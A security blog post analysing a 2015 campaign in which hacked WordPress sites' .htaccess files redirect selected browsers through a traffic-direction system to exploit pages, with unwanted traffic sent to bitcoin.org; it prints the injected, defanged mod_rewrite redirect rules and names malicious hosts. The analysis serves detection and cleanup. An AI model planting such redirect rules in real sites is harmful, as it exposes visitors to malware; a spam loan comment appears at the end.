• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Hacked Websites Redirect to Bitcoin

May 4, 2015Denis Sinegubko

FacebookTwitterSubscribe

Recently, we began to notice that some hacked websites were redirecting traffic from certain browsers to the BitCoin site, bitcoin.org. What’s going on? Is Bitcoin using black hat SEO? Is their site malicious?

Redirect to bitcoin.org
Redirect chain to bitcoin.org in Unmask Parasites results

As you can see, the hacked website doesn’t redirect to bitcoin.org directly. It first redirects to 194 .6 .233 .7/mxjbb . cgi?default, which acts a at raffic directing system (TDS). This piece analyzes request parameters specific to the visitor (IP, browser, referrer, etc.) and makes a decision as to what to do with the particular request. The TDS may have different routes for users from different countries or users with different browsers. Furthermore, the TDS may be completely uninterested in certain requests (e.g. requests from search engine and security bots, or requests from browsers that can be very hard to exploit). A typical TDS would either return some HTTP error (e.g. 404 Page Not Found) or redirect unwanted traffic to some neutral third-party site. Most TDS are configured to dump unwanted traffic to google.com.

In this particular case, the hackers decided to configure their TDS to dump unwanted traffic to bitcoin.org. We can only speculate to intention, but most likely to make this crypto-currency more popular.

Malicious Redirects

OK, so the hacked websites redirect unwanted traffic to bitcoin.org, but what do they do with the traffic they are interested in?

In case of Internet Explorer browsers, we see “194 .6 .233 .7/mxjbb . cgi?default” redirecting to “hxxp://corp . thebridge .jp/wp-api.php” — another hacked site where the wp-api.php page serves a malicious JavaScript crafted specifically for Internet Explorer browsers. The script works in IE8 compatibility mode (“IE=EmulateIE8″). The script also uses ActiveX objects to inspect users’ computers to see whether they use Kaspersky or TrendMicroVMWare, VirtualBox or Parallels.

If none of these are found, the malware injects a Flash exploit from “book . bondcube . biz“.  

Infected .htaccess

Now let’s see what’s going on with the hacked sites.

In the .htaccess files, hackers injected the following mod_rewrite rules:

#BEGIN WordPress

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "MSIE|Trident|iPhone|Presto" [NC]
RewriteRule ^(.*)$ hxxp://194 .6 .233 .7/mxjbb .cgi?default [L,R=302]

#END WordPress

This code redirects all visitors with Microsoft Internet Explorer, other Trident-based browsers (MSIE, Trident), Presto-based browsers (e.g. some versions of Opera), and iPhone browsers to the malicious TDS on “194 .6 .233 .7″

Note that they placed the code inside the “#BEGIN WordPress …#END WordPress” comments to make them look more credible. We see this kind of thing quite often, so don’t be fooled.

If you check Google Safe Browsing diagnostic page for this IP address, it currently reports 1825 infected domains. You should note that Google actually provides a report for “194.6.233.0“, which corresponds to all IP addresses from the 194 .6 .233 .0-255 subnetwork (Ukraine, Kiev, Specavtomatika Ltd).

Indeed, this is not the first wave of this attack. For example, in March we saw the following malicious code in .htaccess files:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "android" [NC]
RewriteRule ^(.*)$ hxxp://194 .6 .233 .48/BrowserCheck [L,R=302]

Almost the same mod_rewrite rules. Back then they targeted Android devices and redirected to a TDS on a neighboring IP address on the same subnetwork.

Some other IPs on this subnetwork are also known for malware distribution. For example check this VirusTotal report for 194 .6 .233 .23.

Infection Vector: Outdated Plugins

This infection targets mainly WordPress websites. On most of the infected sites we cleaned, we found old versions of the Slider Revolution (Revslider) plugin and backdoors uploaded via the Revslider vulnerabilities (similar to those used in the SoakSoak infection.)

The vulnerabilities in the Revslider plugin have been fixed for more than a year now, but many users and themes that incorporated the plugin have still failed to update (update information). We saw many massive attacks that exploited these vulnerabilities over the past six months, and thousands of webmasters learned the importance of timely plugin updates the hard way. Nonetheless, there are still many sites out there that use outdated themes and plugins. Inevitably, hackers find such sites and compromise them.

Please don’t think that only the Slider Revolution plugin needs to be updated. Keep all of your plugins and themes up-to-date. Any plugin can have critical vulnerabilities at any given time, known or unknown. Even the most popular plugins can have security issues. For example, Jetpack, WordPress SEO, Gravity Form and many other plugins recently fixed a common XSS vulnerability. Morale of the story,  please update!

If you find it hard to keep up with all the security news and can’t quickly update your site software, we recommend using a website firewall (WAF) to virtually patch your site against attacks that try to exploit known and unknown weaknesses in code, otherwise known as software vulnerabilities.

FacebookTwitterSubscribe

Categories: Website Security, WordPress SecurityTags: Conditional Malware, Hacked Websites, Redirects, Website Ransomware, WordPress Plugins and Themes

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Reader Interactions

Comments

  1. Denis Sinegubko

    May 22, 2015

    Thanks for sharing this.

    Given the dates and numbers, it may be not this very infection alone. We began to notice many redirects to bitcoin.org in the second half of April. But in your stats the numbers are pretty consistent since the second half of March. I also doubt that the hackers ready to dump millions of hits of English-speaking traffic to whatever site. However, if this is really that attack – I’m impressed.

  2. mhay biarulla

    June 12, 2015

    hello

    Apply for a quick and convenient loan to pay off bills and to start a new financing your projects at a cheapest interest rate of 3%. Do contact us today via: elijahloanfirm@outlook.com with loan amount needed as our minimum loan offer is 1,000.00 to any choice of loan amount.I am certified ,registered and legit lender.You can contact me today if you are interested in getting this loan, contact me for more information about the loan process, process like the loan terms and conditions and how the loan will be transferred to you. I need your urgent response if you are interested.

    Thank you

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.